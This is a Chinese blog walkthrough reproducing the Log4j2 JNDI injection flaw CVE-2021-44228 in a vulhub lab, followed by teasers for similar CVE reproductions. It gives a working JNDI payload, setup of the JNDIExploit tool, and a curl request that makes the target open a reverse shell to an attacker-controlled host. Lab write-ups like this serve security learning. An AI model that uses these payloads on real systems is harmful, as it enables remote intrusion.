Log4j2 远程命令执行漏洞 CVE-2021-44228

发表于2026-02-08|更新于2026-03-15|漏洞

|总字数:387|阅读时长:1分钟

影响范围

Apache Log4j 2.0-beta9 - 2.14.1

漏洞类型

JNDI 注入

操作系统限制

无

配置要求

开启端口 8983 和 5005

漏洞利用

命令执行，反弹 shell

利用原理

Log4j 支持 JNDI 协议的 Lookup 功能，该功能运行开发者在日志中动态插入系统属性（语法格式为 ${prefix:name}），而通过 JNDI，Java 查询可以连接外部资源，攻击者在这里用到了 LDAP 目录服务。攻击者在 HTTP Header 或 URL 参数中发送构造的 payload：${jndi:ldap://攻击机 ip:1389/Exploit}，后端处理这个请求时候会把这个 payload 信息写入日志，Log4j 解析 payload 时，靶机向攻击机请求 LDAP 资源，攻击机返回恶意代码，靶机执行恶意代码完成命令执行

漏洞复现

用现成的 vulhub 来拉取镜像

#下载vulhub源代码
git clone https://github.com/vulhub/vulhub.git
#进入漏洞目录
cd vulhub/log4j/CVE-2021-44228
#拉取镜像
docker-compose up -d

1773549482803

下载工具 JNDIExploit

git clone https://github.com/black9/Log4shell_JNDIExploit.git
cd Log4shell_JNDIExploit
#--如果没有unzip，下载命令yum install -y unzip
unzip JNDIExploit.v1.2.zip

1773549515834

使用工具

1	java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 攻击机ip

1773549568397

开启 nc 监听

1773549681946

输入攻击请求，成功则返回 200

1
2

#url编码部分原文为${jndi:ldap://攻击机:1389/Basic/ReverseShell/攻击机/nc监听端口}
curl -i -k "http://靶机ip:8983/solr/admin/cores?test=%24%7Bjndi%3Aldap%3A%2F%2F攻击机ip%3A1389%2FBasic%2FReverseShell%2F攻击机ip%2F监听端口%7D"

1773549714204

JNDIExploit 窗口有回显

1773549877981

反弹 shell 成功连接

1773549916116

文章作者: Johan

文章链接: https://cjh-1001.github.io/2026/02/08/CVE-2021-44228/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Johan的秘密小窝！

相关推荐

Shiro 认证绕过漏洞 CVE-2020-1957

影响范围 Apache Shiro 1.0.0-incubating - 1.5.1 漏洞类型权限绕过操作系统限制无配置要求 Shiro 拦截器采用了路径匹配模式漏洞利用登录管理后台，信息泄露利用原理在 Shiro 的 1.5.2 之前的版本中，WebUtils.getPathWithinApplication() 方法处理 URL 时候会根据分号对路径进行截断，会认为分号后面不属于路径一部分；而 Spring 框架在匹配控制器路由时候，会对 URL 进行标准化处理（例如解析穿越符..），它对分号处理方式不同。二者对请求的解析不一样，攻击者通过特殊构造/;/路径来绕过 Shiro 的过滤漏洞复现现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vulhub/vulhub.git#进入漏洞目录cd vulhub/shiro/CVE-2020-1957#拉取镜像docker-compose up -d 抓取 http://靶机 ip:8080/admin 数据包发送到 Repeater...

Log4j 反序列化命令执行漏洞 CVE-2017-5645

影响范围 Apache Log4j 2.0-alpha1 - 2.8.1 漏洞类型Java 反序列化操作系统限制无配置要求启动 Log4j 的 TcpSocketServer 服务，监听 4712 端口（也可指定其他端口）漏洞利用命令执行，反弹 shell，植入木马利用原理Log4j 的 TcpSocketServer 和 UdpSocketServer 类中，在接收日志数据时，没有对数据进行安全检验，直接通过 ObjectInputSteam.readObject() 进行反序列化，攻击者可以构造被序列化的恶意对象链来实现命令执行漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vulhub/vulhub.git#进入漏洞目录cd vulhub/log4j/CVE-2017-5645#拉取镜像docker-compose up -d 扫描靶机端口 4712，用 telnet 连接成功连接，说明端口开放 12telnet 公网ip 被扫描端口nc -zv 公网ip 被扫描端...

Nginx 整数溢出漏洞 CVE-2017-7529

影响范围 Nginx 0.5.6 - 1.13.2 漏洞类型整数溢出操作系统限制无配置要求Nginx 开启了缓存功能漏洞利用信息泄露利用原理Nginx 处理 Range 请求的模块计算请求范围时候使用了 64 位有符号整数，在计算多段请求时候，Nginx 会计算总的返回长度，攻击者通过给出接近 64 位整数机选大数字，两个负数相减或正数相加，结果超过 64 位整数能表示的最大范围，这个数值在计算机内部发生了溢出。当 Nginx 开启了缓存，存文件的格式不是纯文本，而是包含 KEY、过期时间、后端服务器信息，后端返回的原始头信息，以及真正的网页内容，由于漏洞导致的整数溢出（没做边界检验），攻击者构造负数起始位置，在通过整数溢出使得请求变得合理（大整数与负数相加后整数溢出变成极小的数，极小的数小于实际文件总长，使服务器认为请求合理），Nginx 内部计算的原始读取位置发生了偏移，可以让出错的指针刚好落到缓存头区域，进而读到缓存的内容漏洞复现现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vu...

Struts2 远程代码执行漏洞 CVE-2017-9805

影响范围 Struts 2.1.2 - 2.3.33 Struts 2.5 - 2.5.12 漏洞类型XML 反序列化操作系统限制无配置要求默认配置漏洞利用写入敏感文件，反弹 shell 获取服务器权限利用原理Struts2 框架对外部组件 XStream 插件默认使用 XStream 处理 XML 格式数据，可以将几乎任何 XML 标签映射为 Java 对象，攻击者在 Java 运行库寻找可以执行系统命令的类，由于 XStream 没有限制，攻击者可以构造特殊的 XML，包含触发点、执行链、敏感命令漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone https://github.com/vulhub/vulhub.git#进入漏洞目录cd vulhub/struts2/s2-052#拉取镜像docker-compose up -d 访问 http://公网: 8080/orders 用 burpsuite 抓取 http://公网: 8080/orders/3/edit 数据包发送到 Repeater 模...

Spring Data Commons 远程命令执行 CVE-2018-1273

影响范围 Spring Data Commons 1.13 - 1.13.10 Spring Data Commons 2.0 - 2.0.5 Spring Boot 1.5.0 - 1.5.11 Spring Boot 2.0.0 - 2.0.1 漏洞类型SpEL 表达式注入操作系统限制无配置要求默认配置漏洞利用命令执行，进行反弹 shell，写入木马利用原理Spring MVC 中，当用户通过 POST 表单提交数据，Spring Data 会尝试将请求参数绑定到后端 Java 对象或 Map 中，Spring Data 允许参数名通过方括号语法定位集合或 Map 中的元素（例如 tags [0] 或 users [‘admin’]），当 Spring Data 处理方括号 2 的参数名时候，会调用 MapDataBinder 进行解析，而系统直接调用 SpEL 引擎来解析方括号内容且不做过滤，攻击者可以通过参数名的方括号注入恶意 SpEL 代码实现命令执行漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码git clone http...

Struts2 远程命令执行漏洞 CVE-2016-3081

影响范围 Struts 2.3.18 - 2.3.28（不包括 2.3.20.2 和 2.3.24.2）漏洞类型OGNL 表达式注入操作系统限制无配置要求默认配置漏洞利用执行命令，可以执行各种敏感操作，例如任意文件读取，植入木马，内网探测利用原理在配置文件 struts.xml 开启了 devMode（开发者模式），其中允许通过 method 前缀来动态执行 Action 方法。Struts2 内部存在一个安全沙盒，默认禁止执行危险的 Java 方法，为允许调用执行系统命令所需 Java 类，将上下文访问权限重置为默认，payload 片段为 #_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS。权限限制接触后，攻击者通过调用 Java 环境的 Runtime 环境执行系统级别的命令，payload 片段为 @java.lang.Runtime@getRuntime ().exec(‘id’)，其中 id 可替换成其他敏感命令漏洞复现用现成的 vulhub 来拉取镜像 123456#下载vulhub源代码g...

评论

数据加载中